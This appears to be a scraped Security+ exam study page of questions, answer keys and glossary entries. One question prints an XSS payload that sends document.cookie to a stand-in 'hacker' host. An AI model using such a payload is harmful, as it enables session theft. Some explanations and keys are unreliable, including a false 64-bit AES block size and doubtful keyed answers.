Security Plus Study Question v1

Réussis tes devoirs et examens dès maintenant avec Quizwiz!

13. Which of the following best describes a network based attack that can allow an attacker to take full control of a vulnerable host? a. Remote exploit b. Amplification c. Sniffing d. Man-in-the middle attack

16. A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permissions settings. Which of the following produced the report? a. Vulnerability scanner b. Protocol scanner c. Network mapper d. Web inspector

18. Which of the following differentiates a collision attack from a rainbow table attack? a. A rainbow table attack performs a hash lookup b. A rainbow table attack uses the hash as a password c. In a collision attack, the hash and the input data are equivalent d. In a collision attack, the same input results in different hashes

28. A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario. Which of the following would be best method of configuring the load balancer? a. Round robin b. Weighted c. Least connection d. Locality based

3. A company wants to ensure that confidential data from storage media is sanitized in such a way that the drive cannot be reused. Which of the following methods should the technician use? a. Shredding b. Wiping c. Lower level formatting d. Repartitioning e. Overwriting

35. Which of the following threat actors is most likely to steal a company's proprietary information to gain a market edge and reduce time to market? a. Competitor b. Hacktivist c. Insider d. Organized crime

37. Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data? a. Symmetric encryption b. Hash function c. Digital Signature d. Obfuscation

41. Based on risk assessment, the ARO value of a malware infection for the server is 5. The annual cost for the malware protection is $2500. Which of the following SLE values warrants a recommendation against purchasing the protection? a. $500 b. $1000 c. $2000 d. $2500

42. A security engineer must install the same X509 certificate on three separate servers. The client application that connects to the server performs a check to ensure that the certificate matches the host name. Which of the following should the security engineer use? a. Wildcard certificate b. Extended validation certificate c. Certificate chaining d. Certificate utilizing the SAN field

44. A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main site is in a hurricane affected area and the disaster recovery site is 100 miles (161km) away. The company wants to ensure its business is always operational with the least amount of man hours needed. Which of the following types of disaster recovery sites should the company implement? a. Hot site b. Warm site c. Cold site d. Cloud based site

45. A forensic export is given a hard drive from a crime scen3e and is asked to perform an investigation. Which of the following is the first step the forensic expert needs to take to protect the chain of custody? a. Make a forensic copy b. Create a hash of the drive c. Recover the hard drive data d. Update the evidence log

46. A remote intruder wants to take inventory of a network so exploits can be researched. The intruder is looking for information about software versions on the network. Which of the following techniques is the intruder using? a. Banner grabbing b. Port scanning c. Packet sniffing d. Virus scanning

49. Which of the following specifically describes the exploitation of an interactive process to access otherwise restricted areas of the Operating System? a. Privilege escalation b. Pivoting c. Process affinity d. Buffer overflow

55. When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be most suited? a. Infrastructure b. Platform c. Software d. Virtualization

56. Whilst on a business trip, a user's mobile device goes missing. The user immediately contacts the organization's service desk to report the incident. Which of the following is the best response to protect the data stored on the user's mobile device? a. Remote wipe the mobile device via the Mobile Device Manager to ensure that data is not compromised b. Deploy full device encryption through the Mobile Device Manager to ensure data is not accessed c. Track the mobile device through geolocation services, and then alert the authorities of its whereabouts d. Initiate remote lockout on the mobile device to prevent unauthorized access

60. Joe, a salesman, was assigned to a new project that requires him to travel to a client site. Whilst waiting for a flight, Joe decides to connect to the airport wireless network without connecting to a VPN, and then sends confidential emails to fellow colleagues. A few days later, the company experiences a data breach. Upon investigation the company learns Joe's emails were intercepted. Which of the following most likely caused the data breach? a. Policy violation b. Social engineering c. Insider threat d. Zero-day attack

63. A computer emergency response team is called at midnight to investigate a case in which a mail server was restarted. After an initial investigation, it was discovered that email is being exhilarated through an active connection. Which of the following is the next step the team should take? a. Identify the source of the active connection b. Perform eradication on the active connection and recover c. Perform a containment procedure by disconnecting the server d. Format the server and restore its initial configuration

68. A security technician is configuring an access management system to track and record user actions. Which of the following functions should the technician configure? a. Accounting b. Authorization c. Authentication d. Identification

69. Most organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all organizations use the native 802.1x client on their mobile devices? a. Shibboleth b. RADIUS federation c. SAML d. OAuth e. OpenID Connect

7. Users from two organizations, each with its own PKI, need to begin working together on a new project. Which of the following would allow the users of the separate PKIs to work together without connections errors? a. Trust model b. Stapling c. Intermediate CA D. Key escrow

73. After a user reports slow computer performance, a systems administrator detects a suspicious file, which was installed as part of a freeware software package. The systems administrator reviews the output below: C:\windows\system32>netstat -nab Active connections Proto Local Address Foreign Address State TCP 0.0.0.0:135 0.0.0.0:0 LISTENING Rpc5s (svchost.exe) TCP 0.0.0.0:445 0.0.0.0:0 LISTENING (svchost.exe) TCP 192.168.1.10:5000 10.37.213.20 ESTANLISHED winserver.exe UDP 192.168.1.10:1900 *.* Based on the above information, which of the following types of malware was installed on the user's computer? a. RAT b. Key logger c. Spyware d. Worm e. Bot

74. A user typically works remotely over the holidays, using a web based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is the likely cause? a. The certificate has expired b. The browser does not support SSL c. The user's account is locked out d. The VPN software has reached the seat license maximum

8. An application was recently compromised after some malformed data came in via a web form. Which of the following would be most likely have prevented this? a. Input validation b. Proxy server c. Stress testing d. Encoding

802.1x

A port-based authentication protocol. Wireless can use 802.1X. For example, WPA2-Enterprise mode uses an 802.1X server (implemented as a RADIUS server) to add authentication.

75. Which of the following answers refers to an agreement established between the organizations that own and operate connected IT systems to document the technical requirements of the interconnection? A. ISA B. SLA C. MoU D. BPA

Answer: A. ISA Explanation: The term Interconnection Security Agreement (ISA) refers to an agreement established between the organizations that own and operate connected IT systems to document the technical requirements of the interconnection

63. In which of the cloud computing infrastructure types, clients, instead of buying all the hardware and software, purchase computing resources as an outsourced service from suppliers who own and maintain all the necessary equipment? A. IaaS B. SaaS C. P2P D. PaaS

Answer: A. IaaS Explanation: Infrastructure as a Service (IaaS) is one of the cloud computing infrastructure types where clients, instead of buying all the hardware and software, purchase computing resources as an outsourced service from suppliers who own and maintain all the necessary equipment. The clients usually pay for computational resources on a per-use basis. In IaaS, cost of the service depends on the amount of consumed resources.

87. In forensic procedures, a sequence of steps in which different types of evidence should be collected is known as: A. Order of volatility B. Layered security C. Chain of custody D. Transitive access

Answer: A. Order of volatility Explanation: In forensic procedures, a sequence of steps in which different types of evidence should be collected is known as order of volatility.

68. Which of the following is an example of a multifactor authentication? A. Password and biometric scan B. User name and PIN C. Smart card and identification badge D. Iris and fingerprint scan

Answer: A. Password and biometric scan Explanation: Authentication is proving user identity to a system. Authentication process can be based on different categories of authentication factors, including unique physical traits of each individual such as fingerprints ("something you are"), physical tokens such as smart cards ("something you have"), or user names and passwords ("something you know"). Additional factors might include geolocation ("somewhere you are"), or user-specific activity patterns such as for example keyboard typing style ("something you do"). Multi-factor authentication systems require implementation of authentication factors from two or more different categories.

34. Which of the following tools would be used to check the contents of an IP packet? A. Protocol analyzer B. Secure Shell (SSH) C. SNMP agent D. Port scanner

Answer: A. Protocol analyzer Explanation: Protocol analyzer (also known as packet sniffer) is a tool used for capturing and analyzing contents of network packets.

81. A maximum acceptable period of time within which a system must be restored after failure is referred to as: A. Recovery Time Objective (RTO) B. Mean Time To Restore (MTTR) C. Maximum Tolerable Period of Disruption (MTPOD) D. Mean Time Between Failures (MTBF)

Answer: A. Recovery Time Objective (RTO) Explanation: A maximum acceptable period of time within which a system must be restored after failure is also known as Recovery Time Objective (RTO). RTOs are established at the Business Impact Analysis (BIS) stage of the Business Continuity Planning (BCP). The goal of a Business Impact Analysis is to determine the impact of any disruption of the activities that support the organization's key products and services. A key aspect of determining the impact of a disruption is identifying the so called Maximum Tolerable Period of Disruption (MTPOD), which is the maximum amount of time that an enterprise's key products or services can be unavailable or undeliverable after an event that causes disruption to operations. The goal of Recovery Time Objective is to ensure that the Maximum Tolerable Period of Disruption (MTPD) for each activity is not exceeded.

82. Which of the terms listed below is used to describe the loss of value to an asset based on a single security incident? A. SLE B. ARO C. ALE D. SLA

Answer: A. SLE Explanation: The term Single Loss Expectancy (SLE) is used to describe the loss of value to an asset based on a single security incident.

69. An authentication subsystem that enables a user to access multiple, connected system components (such as separate hosts on a network) after a single login at only one of the components is known as: A. SSO B. SSH C. SSL D. SLA

Answer: A. SSO Explanation: An authentication subsystem that enables a user to access multiple, connected system components (such as separate hosts on a network) after a single login at only one of the components is known as Single Sign-On (SSO). A single sign-on subsystem typically requires a user to log in once at the beginning of a session, and then during the session grants further access to multiple, separately protected hosts, applications, or other system resources without further login action by the user.

19. Which of the terms listed below is used to describe an unskilled individual exploiting computer security loopholes with the use of code and software written by someone else? A. Script kiddie B. Black hat hacker C. Hactivist D. White hat hacker

Answer: A. Script kiddie Explanation: Unskilled individuals exploiting computer security loopholes with the use of code and software written by someone else are called script kiddies.

2. Which of the following answers refers to malicious software performing unwanted and harmful actions in disguise of a legitimate and useful program? A. Trojan horse B. Spyware C. Logic bomb D. Adware

Answer: A. Trojan horse Explanation: Software that performs unwanted and harmful actions in disguise of a legitimate and useful program is referred to as a Trojan horse. This type of malware may act like a legitimate program and have all the expected functionalities, but apart from that it will also contain a portion of malicious code appended to it that the user is unaware of.

51. A logical grouping of computers that may be physically located on different parts of a LAN is called Virtual Local Area Network (VLAN). A. True B. False

Answer: A. True Explanation: A logical grouping of computers that may be physically located on different parts of a LAN is called Virtual Local Area Network (VLAN). VLANs allow computer hosts to act as if they were attached to the same broadcast domain, regardless of their physical location. VLAN membership can be configured through software instead of physically relocating devices or connections, and VLANs are often created with the use of switches equipped with additional software features.

55. One of the measures used in OS hardening includes disabling unnecessary ports and services. A. True B. False

Answer: A. True Explanation: Disabling unnecessary ports and services is one of the measures for securing an Operating System (OS) software.

89. Which of the following backup site types allows for fastest disaster recovery? A. Cold site B. Hot site C. Warm site D. Cross-site

Answer: B. Hot site Explanation: A hot site is a type of backup site that allows for fastest disaster recovery. Hot site constitutes a mirror copy of the original site, with all the facilities, equipment, and data readily available for use in case of emergency.

61. A software application used to manage multiple guest operating systems on a single host system is called: A. ICS server B. Hypervisor C. UC server D. Virtual switch

Answer: B. Hypervisor Explanation: A software application used to manage multiple guest operating systems on a single host system is called hypervisor.

100. What is the name of a storage solution used to retain copies of private encryption keys? A. Trusted OS B. Key escrow C. Proxy D. Recovery agent

Answer: B. Key escrow Explanation: Key escrow is a storage solution used to retain copies of private encryption keys.

29. Disabling SSID broadcast: A. Is one of the measures used for securing networks B. Makes a WLAN harder to discover C. Blocks access to WAP D. Prevents wireless clients from accessing the network

Answer: B. Makes a WLAN harder to discover Explanation: Service Set Identifier (SSID) is another term for the name of a Wireless Local Area Network (WLAN). Wireless networks advertise their presence by regularly broadcasting the SSID in a special packet called beacon frame. In wireless networks with disabled security features knowing the network SSID is enough to get access to the network. SSID can be hidden by disabling the SSID broadcast on the Wireless Access Point (WAP), but hidden SSID makes a WLAN only harder to discover and is not a true security measure. Wireless networks with hidden SSID can still be discovered with the use of a packet sniffing software. Security measures that help in preventing unauthorized access to a wireless network include strong encryption schemes such as WPA and WPA2.

1. Harmful programs used to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems are commonly referred to as: A. Adware B. Malware C. Ransomware D. Spyware

Answer: B. Malware Explanation: The term malware (short for malicious software) describes a wide category of harmful computer programs used to disrupt computer operation, gather sensitive information, or gain unauthorized access to computer systems.

65. Which of the security controls listed below is used to prevent tailgating? A. Hardware locks B. Mantraps C. Video surveillance D. EMI shielding

Answer: B. Mantraps Explanation: Mantraps are two-door entrance points connected to a guard station. A person entering mantrap from the outside remains inside until he/she provides authentication token required to unlock the inner door. Mantraps are used to prevent tailgating, which is the practice of gaining unauthorized access to restricted areas by following another person.

76. A document established between two or more parties to define their respective responsibilities in accomplishing a particular goal or mission is called: A. BPA B. MoU C. SLA D. ISA

Answer: B. MoU Explanation: A document established between two or more parties to define their respective responsibilities in accomplishing a particular goal or mission is known as Memorandum of Understanding (MoU).

99. Which of the following solutions would be the fastest in validating digital certificates? A. IPX B. OCSP C. CRL D. OSPF

Answer: B. OCSP Explanation: Online Certificate Status Protocol (OCSP) allows for querying Certificate Authority (CA) for validity of a digital certificate. Another solution for checking whether a certificate has been revoked is Certificate Revocation List (CRL). CRLs are updated regularly and sent out to interested parties. Compared to CRL, OCSP allows for querying the CA at any point in time and retrieving information without any delay.

93. Any type of information pertaining to an individual that can be used to uniquely identify that individual is known as: A. PIN B. PII C. ID D. Password

Answer: B. PII Explanation: Personally Identifiable Information (PII) includes any type of information pertaining to an individual that can be used to uniquely identify that individual. Identity of a person can be established by tracing their most basic attributes such as name, surname, phone number or traditional mailing address, but also through their social security or credit card numbers, IP or email addresses, or data collected via biometric devices. Security of PII has become major concern for companies and organizations due to the accessibility of this type of data over the Internet, but also due to misuse of personal electronic devices such as USB drives or smartphones that are easily concealable and can carry large amounts of data.

5. Which type of Trojan enables unauthorized remote access to a compromised system? A. pcap B. RAT C. MaaS D. pfSense

Answer: B. RAT Explanation: Remote Access Trojan (RAT) is a type of Trojan horse malware that enables unauthorized remote access to a compromised system.

86. Disabling certain system functions or shutting down the system when risks are identified is an example of: A. Risk acceptance B. Risk avoidance C. Risk transference D. Risk deterrence

Answer: B. Risk avoidance Explanation: Disabling certain system functions or shutting down the system when risks are identified is an example of risk avoidance.

58. Which of the answers listed below refers to a control system providing the capability for real-time monitoring and gathering information related to industrial equipment? A. OVAL B. SCADA C. TACACS D. SCAP

Answer: B. SCADA Explanation: Supervisory Control And Data Acquisition (SCADA) is a control system providing the capability for real-time monitoring and gathering information related to industrial equipment.

50. A bank is experiencing a DoS attack against an application designed to handle 500 IP based sessions. In addition, the perimeter router can only handle 1 Gbps of traffic. Which of the following should be implemented to prevent DoS attacks in the future? a. Deploy multiple web servers and implement a load balancer b. Increase the capacity of the perimeter router to 10Gbps c. Install a firewall at the network border to prevent all attacks d. Use redundancy across all network devices and services

54. The Chief Security Officer of a university is concerned about potential transmissions of username and passwords in clear text when authenticating to a directory server. Which of the following would best mitigate the CISOs concerns? a. SFTP b. SNMPv3 c. LDAPS d. SMB

57. An auditor confirms the risk associated with Windows specific vulnerability that was discovered by the company's security tool, does not apply due to the server running a Linux OS. Which of the following does this best describe? a. Inherent risk b. Attack vector c. False positive d. Remediation

66. A network administrator needs to allocate a new network for the R&D group. The network must not be accessible from the internet, regardless of the network firewall or other external misconfiguration. Which of the following setting should the network administrator implement to accomplish this? a. Configure the OS default TTL to 1 b. Use NAT on the R&D network c. Implement a router ACL d. Enable protected ports on the switch

9. A recent internal audit is forcing a company to review each internal businesses unit's VMs because the clusters they are installed on is in danger of running out of computer resources. Which of the following vulnerabilities exists? a. Buffer overflow b. End of life systems c. System sprawl d. Weak configuration

38. A security analyst conducts a manual scan on a known hardened host that identifies many non-compliant configuration items. Which of the following best describe why this has occurred? Select two a. Privileged user credentials were used to scan the host b. Non-applicable plugins were selected in the scan policy c. The incorrect audit file was used d. The output of the report contains false positives e. The target host has been compromised

C,D

Certificate Authority. An organization that manages, issues, and signs certificates and is part of a PKI. Certificates are an important part of asymmetric encryption. Certificates include public keys along with details on the owner of the certificate and on the CA that issued the certificate. Certificate owners share their public key by sharing a copy of their certificate.

CRL

Certification Revocation List. A list of certificates that have been revoked. Certificates are commonly revoked if they are compromised. The certificate authority (CA) that issued the certificate publishes a CRL, and a CRL is public.

CHAP

Challenge Handshake Authentication Protocol. Authentication mechanism where a server challenges a client. MS-CHAPv2 is an improvement over CHAP and uses mutual authentication.

CCTV

Closed-circuit television. This is a detective control that provides video surveillance. Video surveillance provides reliable proof of a person's location and activity. It can be used by an organization to verify if any equipment or data is being removed.

CAC

Common Access Card. A specialized type of smart card used by United States Department of Defense. It includes photo identification and provides confidentiality, integrity, authentication, and non-repudiation for the users. It is similar to a PIV.

CERT

Computer Emergency Response Team. A group of experts that respond to security incidents. Also known as CIRT, SIRT, or IRT.

CIRT

Computer Incident Response Team. A group of experts that respond to security incidents. Also known as CERT, SIRT, or IRT.

CIA

Confidentiality, integrity, and availability. These three form the security triad. Confidentiality helps prevent the unauthorized disclosure of data. Integrity provides assurances that data has not been modified, tampered with, or corrupted. Availability indicates that data and services are available when needed.

COOP

Continuity of Operations Plan. A COOP site provides an alternate location for operations after a critical outage. A hot site includes personnel, equipment, software, and communications capabilities of the primary site with all the data up to date. A hot site can take over for a failed primary site within an hour. A cold site will have power and connectivity needed for COOP activation, but little else. A warm site is a compromise between a hot site and a cold site.

CAN

Controller Area Network. A standard that allows microcontrollers and devices to communicate with each other without a host computer.

QUESTION 1 A security administrator wants to implement a logon script that will prevent MITM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task? A. arp - s 192.168.1.1 00-3a-d1-fa-b1-06 B. dig - [email protected] mypc.comptia.com C. Nmap - A - T4 192.168.1.1 D. tcpdump - lnv host 192.168.1.1 or either 00:3a:d1:fa:b1:6

Correct Answer: A

QUESTION 103Two users must encrypt and transmit a large amount of data between them. Which of the following should they use to encrypt and transmit the data? A. Symmetric algorithm B. Hash function C. Digital signature D. Obfuscation

Correct Answer: A

QUESTION 108Which of the following is the proper order for logging a user into a system from the first step to the last step? A. Identification, authentication, authorization B. Identification, authorization, authentication C. Authentication, identification, authorization D. Authentication, identification, authorization E. Authorization, identification, authentication

Correct Answer: A

QUESTION 129An organization wants to upgrade its enterprise-wide desktop computer solution. The organization currently has500 PCs active on the network. the Chief Information Security Officer (CISO) suggests that the organization employs desktop imaging technology for such a large scale upgrade. Which of the following is a security benefit of implementing an imaging solution? A. it allows for faster deployment B. it provides a consistent baseline C. It reduces the number of vulnerabilities D. It decreases the boot time

Correct Answer: B

52. In computer networks, a computer system or an application that acts as an intermediary between another computer and the Internet is commonly referred to as: A. Load balancer B. Web server C. VPN concentrator D. Proxy server

Answer: D. Proxy server Explanation: In computer networks, a computer system or an application that acts as an intermediary between another computer and the Internet is commonly referred to as a proxy server.

85. Contracting out a specialized technical component when the company's employees lack the necessary skills is an example of: A. Risk deterrence B. Risk avoidance C. Risk acceptance D. Risk transference

Answer: D. Risk transference Explanation: Contracting out a specialized technical component when the company's employees lack the necessary skills is an example of risk transference.

46. What is the name of a secure replacement for Telnet? A. ICMP B. FTP C. IPv6 D. SSH

Answer: D. SSH Explanation: Secure Shell (SSH) is a tunneling protocol for secure remote login and other secure network services designed as a replacement for Telnet and other insecure remote shells.

78. Which of the answers listed below refers to a concept of having more than one person required to complete a given task? A. Acceptable use policy B. Job rotation C. Multifactor authentication D. Separation of duties

Answer: D. Separation of duties Explanation: A concept of having more than one person required to complete a given task is known as separation of duties. By delegating tasks and associated privileges for a specific process among multiple users this internal control type provides a countermeasure against fraud and errors.

56. The term trusted OS refers to an operating system: A. Admitted to a network through NAC B. Implementing patch management C. That has been authenticated on the network D. With enhanced security features

Answer: D. With enhanced security features Explanation: The term Trusted OS refers to an operating system with enhanced security features. The most common access control model used in Trusted OS is Mandatory Access Control (MAC). Examples of Trusted OS implementations include Security Enhanced Linux (SELinux) and FreeBSD with the TrustedBSD extensions.

40. Windows command-line utility for displaying intermediary points on the packet route is called: A. ping B. netstat C. ipconfig D. tracert

Answer: D. tracert Explanation: Windows command-line utility for displaying intermediary points (routers) the packet is passed through on its way to a destination host is called tracert. Command-line program for testing the reachability of a remote host is called ping. Windows command-line program for displaying TCP/IP configuration details is called ipconfig. Command-line utility used for displaying active TCP/IP connections is called netstat.

48. Which version(s) of the SNMP protocol offer(s) only authentication based on community strings sent in unencrypted form? (Select all that apply) A. SNMPv1 B. SNMPv2 C. SNMPv3 D. SNMPv4

Answers: A and B. SNMPv1 and SNMPv2 Explanation: Of the three existing versions of the Simple Network Management Protocol (SNMP), versions 1 and 2 (SNMPv1 and SNMPv2) offer authentication based on community strings sent in unencrypted form (in cleartext). SNMPv3 provides packet encryption, authentication, and hashing mechanisms that allow for checking whether data has changed in transit.

94. What are the features of Elliptic Curve Cryptography (ECC)? (Select 2 answers) A. Asymmetric encryption B. Shared key C. Suitable for small wireless devices D. High processing power requirements E. Symmetric encryption

Answers: A and C. Asymmetric encryption and Suitable for small wireless devices Explanation: Elliptic Curve Cryptography (ECC) is a type of asymmetric encryption. ECC provides strong encryption while requiring less processing power than other encryption methods which makes it suitable for small wireless devices such as handhelds and cell phones.

95. Advanced Encryption Standard (AES): (Select all that apply) A. Is a symmetric encryption algorithm B. Uses 128-, 192-, and 256-bit keys C. Is an asymmetric encryption algorithm D. Uses block cipher algorithm E. Requires multiple passes to encrypt data

Answers: A, B, and D. Is a symmetric encryption algorithm, Uses 128-, 192-, and 256-bit keys, and Uses block cipher algorithm Explanation: Advanced Encryption Standard (AES) is a strong symmetric encryption algorithm. AES uses block cipher algorithm with the block size of 64 bits (compared to stream ciphers which process data by encrypting individual bits, block cipher divides data into separate fragments and encrypts each fragment separately). AES uses 128-, 192-, and 256-bit encryption keys

22. Penetration testing: (Select all that apply) A. Bypasses security controls B. Only identifies lack of security controls C. Actively tests security controls D. Exploits vulnerabilities E. Passively tests security controls

Answers: A, C, and D. Bypasses security controls, Actively tests security controls, and Exploits vulnerabilities Explanation: Penetration testing bypasses security controls and actively tests security controls by exploiting vulnerabilities. Passive testing of security controls, identification of vulnerabilities and missing security controls or common misconfigurations are the characteristic features of vulnerability scanning.

20. Which of the following facilitate(s) privilege escalation attacks? (Select all that apply) A. System/application vulnerability B. Distributed Denial of Service (DDoS) C. Social engineering techniques D. Attribute-Based Access Control (ABAC) E. System/application misconfiguration

Answers: A, C, and E. System/application vulnerability, Social engineering techniques, and System/application misconfiguration Explanation: Unpatched system/application vulnerabilities, social engineering, and system/application configuration errors are all factors facilitating privilege escalation attacks.

67. Solutions providing the AAA functionality include: (Select all that apply) A. MSCHAP B. RADIUS C. PPTP D. TACACS+

Answers: B and D. RADIUS and TACACS+ Explanation: Authentication, Authorization, and Accounting (AAA) is a security architecture framework designed for verification of the identity of a person or process (authentication), granting or denying access to network resources (authorization), and tracking the services users are accessing as well as the amount of network resources they are consuming (accounting). Remote Authentication Dial-In User Service (RADIUS) and Terminal Access Controller Access Control System Plus (TACACS+) are examples of protocols providing the AAA functionality.

QUESTION 13 A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host? A. Backdoor B. Pivoting C. Persistence D. Logic bomb

Correct Answer: B

QUESTION 16A security analyst is acquiring data from a potential network incident. Which of the following evidence is theanalyst MOST likely to obtain to determine the incident?A. Volatile memory captureB. Traffic and logsC. ScreenshotsD. System image capture

Correct Answer: B

QUESTION 1Multiple organizations operating in the same vertical want to provide seamless wireless access for theiremployees as they visit the other organizations. Which of the following should be implemented if all theorganizations use the native 802.1x client on their mobile devices?A. ShibbolethB. RADIUS federationC. SAMLD. OAuthE. OpenlD connect

Correct Answer: B

QUESTION 23 After an identified security breach, an analyst is tasked to initiate the IR process. Which of the following is the NEXT step the analyst should take? A. Recovery B. Identification C. Preparation D. Documentation E. Escalation

Correct Answer: B

QUESTION 26 As part of a new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this? A. Require the use of an eight-character PIN. B. Implement containerization of company data. C. Require annual AUP sign-off. D. Use geo-fencing tools to unlock devices while on the premises.

Correct Answer: B

QUESTION 28Which of the following refers to the term used to restore a system to its operational state?A. MTBFB. MTTRC. RTOD. RPO

Correct Answer: B

QUESTION 2Upon entering an incorrect password, the logon screen displays a message informing the user that thepassword does not match the username provided and is not the required length of 12 characters. Which of thefollowing secure coding techniques should a security analyst address with the application developers to followsecurity best practices?A. Input validationB. Error handlingC. ObfuscationD. Data exposure

Correct Answer: B

QUESTION 36A security analyst is inspecting the results of a recent internal vulnerability scan that was performed againstintranet services. The scan reports include the following critical-rated vulnerability:Title: Remote Command Execution vulnerability in web serverRating: Critical (CVSS 10.0)Threat actor: any remote user of the web serverConfidence: certainRecommendation: apply vendor patchesWhich of the following actions should the security analyst perform FIRST?A. Escalate the issue to senior management.B. Apply organizational context to the risk rating.C. Organize for urgent out-of-cycle patching.D. Exploit the server to check whether it is a false positive.

Correct Answer: B

QUESTION 38A security administrator receives an alert from a third-party vendor that indicates a certificate that was installedin the browser has been hijacked at the root of a small public CA. The security administrator knows there are atleast four different browsers in use on more than a thousand computers in the domain worldwide. Which of thefollowing solutions would be BEST for the security administrator to implement to most efficiently assist with thisissue?A. SSLB. CRLC. PKID. ACL

Correct Answer: B

QUESTION 42Legal authorities notify a company that its network has been compromised for the second time in two years.The investigation shows the attackers were able to use the same vulnerability on different systems in bothattacks. Which of the following would have allowed the security team to use historical information to protectagainst the second attack?A. Key risk indicatorsB. Lessons learnedC. Recovery point objectivesD. Tabletop exercise

Correct Answer: B

QUESTION 45A forensic investigator has run into difficulty recovering usable files from a SAN drive. Which of the followingSAN features might have caused the problem?A. Storage multipathsB. DeduplicationC. iSCSI initiator encryptionD. Data snapshots

Correct Answer: B

QUESTION 47A software development manager is taking over an existing software development project. The team currentlysuffers from poor communication due to a long delay between requirements documentation and featuredelivery. This gap is resulting in an above average number of security-related bugs making it into production.Which of the following development methodologies is the team MOST likely using now?A. AgileB. WaterfallC. ScrumD. Spiral

Correct Answer: B

QUESTION 50A security analyst is migrating a pass-the-hash vulnerability on a Windows infrastructure. Given therequirement, which of the following should the security analyst do to MINIMIZE the risk?A. Enable CHAPB. Disable NTLMC. Enable KerebosD. Disable PAP

Correct Answer: B

QUESTION 51An organization requires users to provide their fingerprints to access an application. To improve security, theapplication developers intend to implement multifactor authentication. Which of the following should beimplemented?A. Use a camera for facial recognitionB. Have users sign their name naturallyC. Require a palm geometry scanD. Implement iris recognition

Correct Answer: B

QUESTION 30 A dumpster diver recovers several hard drives from a company and is able to obtain confidential data from one of the hard drives. The company then discovers its information is posted online. Which of the following methods would have MOST likely prevented the data from being exposed? A. Removing the hard drive from its enclosure B. Using software to repeatedly rewrite over the disk space C. Using Blowfish encryption on the hard drives D. Using magnetic fields to erase the data

Correct Answer: D

QUESTION 33Which of the following would provide additional security by adding another factor to a smart card?A. TokenB. Proximity badgeC. Physical keyD. PIN

Correct Answer: D

QUESTION 5 A penetration tester harvests potential usernames from a social networking site. The penetration tester then uses social engineering to attempt to obtain associated passwords to gain unauthorized access to shares on a network server. Which of the following methods is the penetration tester MOST likely using? A. Escalation of privilege B. SQL injection C. Active reconnaissance D. Proxy server

Correct Answer: C

QUESTION 50A security architect has convened a meeting to discuss an organization's key management policy. Theorganization has a reliable internal key management system, and some argue that it would be best to managethe cryptographic keys internally as opposed to using a solution from a third party. The company should use:A. the current internal key management system.B. a third-party key management system that will reduce operating costs.C. risk benefits analysis results to make a determination.D. a software solution including secure key escrow capabilities.

Correct Answer: C

QUESTION 56A recent internal audit is forcing a company to review each internal business unit's VMs because the clusterthey are installed on is in danger of running out of computer resources. Which of the following vulnerabilitiesexist?A. Buffer overflowB. End-of-life systemsC. System sprawlD. Weak configuration

Correct Answer: C

QUESTION 60Which of the following controls allows a security guard to perform a post-incident review?A. DetectiveB. PreventiveC. CorrectiveD. Deterrent

Correct Answer: C

QUESTION 61Attackers have been using revoked certificates for MITM attacks to steal credentials from employees ofCompany.com. Which of the following options should Company.com implement to mitigate these attacks?A. Captive portalB. Extended validation certificateC. OCSP staplingD. Object identifiersE. Key escrow

Correct Answer: C

QUESTION 64Which of the following describes the key difference between vishing and phishing attacks?A. Phishing is used by attackers to steal a person's identity.B. Vishing attacks require some knowledge of the target of attack.C. Vishing attacks are accomplished using telephony services.D. Phishing is a category of social engineering attack.

Correct Answer: C

QUESTION 68A company has a data classification system with definitions for "Private" and "Public". the company's securitypolicy outlines how data should be protected based on type. The company recently added data type"Proprietary". Which of the following is the MOST likely reason the company added this data type?A. Reduced costB. More searchable dataC. Better data classificationD. Expanded authority of the privacy officer

Correct Answer: C

QUESTION 69An attacker exploited a vulnerability on a mail server using the code below.<HTML><bodyonload=document.location.replace ('http://hacker/post.asp?victim&message =" + document.cookie + "<br>" +"URL:" +"document.location) ; /></body></HTML>Which of the following BEST explains what the attacker is doing?A. The attacker is replacing a cookie.B. The attacker is stealing a document.C. The attacker is replacing a document.D. The attacker is deleting a cookie.

Correct Answer: C

QUESTION 6Which of the following BEST describes an important security advantage yielded by implementing vendordiversity?A. SustainabilityB. HomogeneityC. ResiliencyD. Configurability

Correct Answer: C

QUESTION 70A security administrator installed a new network scanner that identifies new host systems on the network.Which of the following did the security administrator install?A. Vulnerability scannerB. Network-based IDSC. Rogue system detectionD. Configuration compliance scanner

Correct Answer: C

QUESTION 72A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover thedomain controller, the systems administrator needs to provide the domain administrator credentials. Which ofthe following account types is the systems administrator using?A. Guest accountB. Service accountC. User accountD. Local Account

Correct Answer: C

QUESTION 75An audit reported has identifies a weakness that could allow unauthorized personnel access to the facility at itsmain entrance and from there gain access to the network. Which of the following would BEST resolve thevulnerability?A. Faraday cageB. Air gapC. MantrapD. Bollards

Correct Answer: C

QUESTION 77Systems administrator and key support staff come together to simulate a hypothetical interruption of service.The team updates the disaster recovery processes and documentation after meeting. Which of the followingdescribes the team's efforts?A. Business impact analysisB. Continuity of operationC. Tabletop exerciseD. Order of restoration

Correct Answer: C

QUESTION 7Which of the following specifically describes the exploitation of an interactive process to access otherwiserestricted areas of the OS?A. PivotingB. Process affinityC. Buffer overflowD. XSS

Correct Answer: C

QUESTION 85A new security administrator ran a vulnerability scanner for the first time and caused a system outage. Which ofthe following types of scans MOST likely caused the outage?A. Non-intrusive credentialed scanB. Non-intrusive non-credentialed scanC. Intrusive credentialed scanD. Intrusive non-credentialed scan

Correct Answer: C

